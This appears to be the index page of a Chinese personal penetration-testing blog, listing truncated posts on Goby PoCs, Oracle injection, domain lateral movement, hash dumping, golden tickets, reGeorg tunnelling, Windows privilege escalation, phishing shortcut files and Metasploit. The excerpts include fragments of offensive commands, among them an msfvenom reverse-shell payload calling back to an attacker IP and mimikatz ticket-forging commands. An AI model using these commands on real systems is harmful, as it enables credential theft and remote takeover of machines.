Leticia's Blog 
  • 首页
  • 归档
  • 分类
  • 标签
  • 关于
  •   
  •   

goby编写自定义poc

前言goby是一款攻击面分析工具,同时拥有资产扫描、资产识别和漏洞扫描能力,安装简单,直接解压即可使用,界面也非常友好,内置了大量由官方和其他网络安全从业者提供的poc。 官网: https://gobies.org/ 帮助goby提交poc积攒到一定数量可以获取功能更强大的hvv红队专版,本文以CVE-2021-21975 VMware vRealize Operations Manager S

2021-05-07
工具
工具

oracle数据库注入

前言过去渗透遇到oracle注入都是使用工具去跑的,这几天看到相关的文章就想起自己对oracle数据库手工注入的知识点还有所欠缺,本文做次简单的笔记整理 角色123connect --连接角色,基本角色resource --开发者角色dba --超级管理员角色 注入时常用命令123456789101112查询用户名select user from dual;获取当前数据库名select * fr

2021-05-06
sql注入
oracle

域渗透中利用ipc命令执行总结

域环境搭建参考 https://blog.csdn.net/niexinming/article/details/75650128 开启$ipc和$admin 12net share $ipcnet share $admin 直接执行12dir \\IP\c$tasklist /S IP /U 用户 /P 密码 sc123sc \\[HOST] create boom binpath= c:\

2021-04-29
域渗透
域渗透

windows哈希提取方式总结

getpass.exeGetpass.exe是闪电小子开发的一款windows下哈希获取软件,直接运行Getpass.exe即可导出windows密码 pwdump8.exe下载windows工具pwdump8.exe,上传到目标机执行 .\pwdump8.exe Quarks-pwdump.exe打开QuarksPwDump.exe目录,命令行执行QuarksPwDump.exe –dhl

2021-04-22
内网渗透
hash

票据传递攻击

黄金票据攻击 登陆域控,dump Krbtgt用户hash和域sid,privilege::debuglsadump::lsa /patch 获取域信息 切换到普通域用户的机器,生成TGT凭证,用户名为administratormimi下执行kerberos::golden /user:administrator /domain:xxx.com /sid:xx-xx-xx-xx

2021-04-21
域渗透
域渗透

reGeorg内网穿透

前言当遇到拿到webshell却无法取得主机权限的场景下,并不一定就要死磕提权这个思路或者放弃这个入口点,我们可以通过使用reGeorg搭建httptunnel代理直接深入内网。 reGeorg安装使用原版reGeorg项目地址:https://github.com/sensepost/reGeorg 123git clone https://github.com/sensepost/reGeor

2021-04-15
内网渗透
代理

windows提权速查流程

1.可利用漏洞信息收集收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询exp,选择对应的Exp下载运行即可。https://i.hacking8.com/https://github.com/SecWiki/windows-kernel-exploits 提权Exp的运行方式,一般有以下几种: 123

2021-04-12
提权
提权

常见windows钓鱼文件制作

快捷方式1.ps1: 123456$WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("test.lnk") $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" $Shortcu

2021-03-15
钓鱼
钓鱼

msf普通shell升级成meterpreter

升级shell接收普通反弹shell 12345678use multi/handlerset payload windows/shell/reverse_tcprun[*] Started reverse TCP handler on xxxxxxxx[*] Encoded stage with x86/shikata_ga_nai[*] Sending encoded stage (267 b

2021-03-12
msf
msf

powershell无文件

目标出网1234567891011121314151617# 攻击机# msf生成powershell脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 --arch x64 --platform windows -f psh-reflection -o test.ps1# python监

2021-03-11
powershell
powershell
123456…16

搜索

Hexo Fluid